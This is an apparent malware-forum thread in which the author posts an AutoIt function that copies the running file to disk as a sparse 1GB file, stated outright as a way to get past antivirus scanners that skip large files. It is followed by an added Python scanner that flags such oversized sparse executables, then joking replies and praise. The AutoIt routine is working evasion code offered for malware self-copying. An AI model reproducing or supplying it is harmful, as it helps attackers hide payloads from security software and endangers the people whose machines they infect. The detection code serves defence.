Hi bosses, how is everyone?

Nothing unusual, I'm leaving you this simple function that serves to bypass quite a few AVs in their scanning routine.

Use it when you want to auto-copy your file to the hard disk; the function creates a 1GB file, but without allocation on disk.

I hope it's of some use to you ....

Regards
#Include <WinApiEx.au3>
;# =================================================================================
;# FakeSizeAllocation On Disk
;# Ported from C++ Reference
;# Reference http://msdn.microsoft.com/en-us/library/windows/desktop/aa364596%28v=vs.85%29.aspx
;# Author : M3
;# Purpose : Create a 1GB File to Disk Without Allocation ( Check File Property to See )
;# Note :
;# Bypass Scheduler AV Scanners Routines When is Running ( By Size )
;# Tested on WIN_7 x86
;# Coded in AutoItVersion 3.3.8.1
;# Usage : FakeSizeAllocation(@ScriptFullPath , @ScriptDir & '\TestFile.exe' )
;# Enjoy
;# =================================================================================



Func FakeSizeAllocation($sFullFilePath , $sCopyToPath)


	; Declare Vars | Const

	Const $sFSCTL_SET_SPARSE = 0x000900C4 ;  Control Code to Sparse "0" on File Without Allocation Disk  ( DeviceIoControl Reference)

	Local $sBytes , $sPos = 1024 , $sInvalidHandle = 0 , $sPointer = $sPos * $sPos

    Local $sFileRead , $sGetFileLen , $sStruct , $sBufferStruct , $sStructGetBuffer , $sFileCreate , $sWriteFile

	Local $sSparseFile , $sError , $sSetPointer , $sSetSizeFromPointer , $sCloseHandle


	; Start Code

	If FileExists($sFullFilePath) Then ; Check If File Exists

	$sFileRead = FileRead($sFullFilePath) ; Read File to Copy

	$sGetFileLen = BinaryLen($sFileRead) ; Get Binary Bytes

	$sStruct = "Byte" & "[" & $sGetFileLen & "]" ; Create a Pointer to allocate Data

	$sBufferStruct = DllStructCreate($sStruct) ; Create a Struct with pointer

	DllStructSetData($sBufferStruct, 1, $sFileRead) ; Set Specific Data in Struct Element

	$sStructGetBuffer = DllStructGetPtr($sBufferStruct , 1) ; Get Pointer From this Element

	$sFileCreate = _WinAPI_CreateFile($sCopyToPath , 1 ) ; Create File to Copy

	$sWriteFile = _WinAPI_WriteFile($sFileCreate , $sStructGetBuffer, $sGetFileLen, $sBytes) ; Write File With Pointer Element Buffer

    $sSparseFile = _WinAPI_DeviceIoControl($sFileCreate, $sFSCTL_SET_SPARSE , 0 , 0 , 0) ; Set Sparse File Without allocate Size


        If $sSparseFile = $sInvalidHandle Then ; Check if Handle from DeviceIoControl is false

            $sError = _WinAPI_GetLastError()   ; Get Error from DeviceIoControl Call

			ConsoleWrite('Fail .... Error Code : ' & $sError & @CRLF) ; Write the error Number from DeviceIoControl Call Fail

			Exit

		EndIf


	$sSetPointer = _WinAPI_SetFilePointer($sFileCreate , $sPointer * $sPos , 0) ; Move the pointer from Created file

	$sSetSizeFromPointer = _WinAPI_SetEndOfFile($sFileCreate) ; Set File Size to pointer

	$sCloseHandle = _WinAPI_CloseHandle($sFileCreate) ; Close the handle from CreateFile

	ConsoleWrite (@CRLF & 'Success .... ')

    Else

    ConsoleWrite (@CRLF & 'Fail to Read File .... ')

    EndIf

    ; EndCode

EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
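
From the detection side, the file described in the post above reports a 1GB size while almost nothing is allocated on disk, and that mismatch is something a scanner can check for. The following Python is an added example, not part of the original post or the author's code; the extension list, thresholds and function names are assumptions chosen for illustration.

```python
import ctypes
import os
import stat
import sys

EXEC_EXT = {".exe", ".dll", ".scr", ".com"}   # assumed watch list
MIN_LOGICAL = 256 * 2**20                     # assumed: only look at files >= 256 MiB
MAX_RATIO = 0.05                              # assumed: under 5% of the size is on disk

def is_suspicious(name, logical, allocated, attrs=0):
    """Executable whose reported size is large but mostly unallocated (or flagged sparse)."""
    if os.path.splitext(name)[1].lower() not in EXEC_EXT or logical < MIN_LOGICAL:
        return False
    flagged_sparse = bool(attrs & stat.FILE_ATTRIBUTE_SPARSE_FILE)
    return flagged_sparse or allocated < logical * MAX_RATIO

def allocated_size(path, st):
    """Bytes actually backed by disk: GetCompressedFileSizeW on Windows, st_blocks elsewhere."""
    if sys.platform != "win32":
        return st.st_blocks * 512             # POSIX counts 512-byte blocks
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.GetCompressedFileSizeW.argtypes = [ctypes.c_wchar_p, ctypes.POINTER(ctypes.c_ulong)]
    k32.GetCompressedFileSizeW.restype = ctypes.c_ulong
    high = ctypes.c_ulong(0)
    ctypes.set_last_error(0)
    low = k32.GetCompressedFileSizeW(path, ctypes.byref(high))
    if low == 0xFFFFFFFF and ctypes.get_last_error() != 0:
        raise ctypes.WinError(ctypes.get_last_error())
    return (high.value << 32) | low

def scan(root):
    """Walk root and return (path, logical, allocated) for every suspicious file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                alloc = allocated_size(path, st)
            except OSError:
                continue                      # unreadable or vanished file: skip it
            attrs = getattr(st, "st_file_attributes", 0)
            if is_suspicious(name, st.st_size, alloc, attrs):
                hits.append((path, st.st_size, alloc))
    return hits

if __name__ == "__main__":
    for path, logical, alloc in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: logical={logical} allocated={alloc}")
```

A hit here is a reason to scan the file's allocated ranges regardless of its reported size, since the real content is only the small written portion at the start.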
Let's get bypassing!
No wonder my code wasn't working, I was missing some parts
  • button 1start
    select file:=edit1
    increment filesize:=1gb
    if file increment successfully
    bypasing all av
    then destroy av
    then 'todo ok'

    button end
Very good idea, M3
I seem bad, but I'm good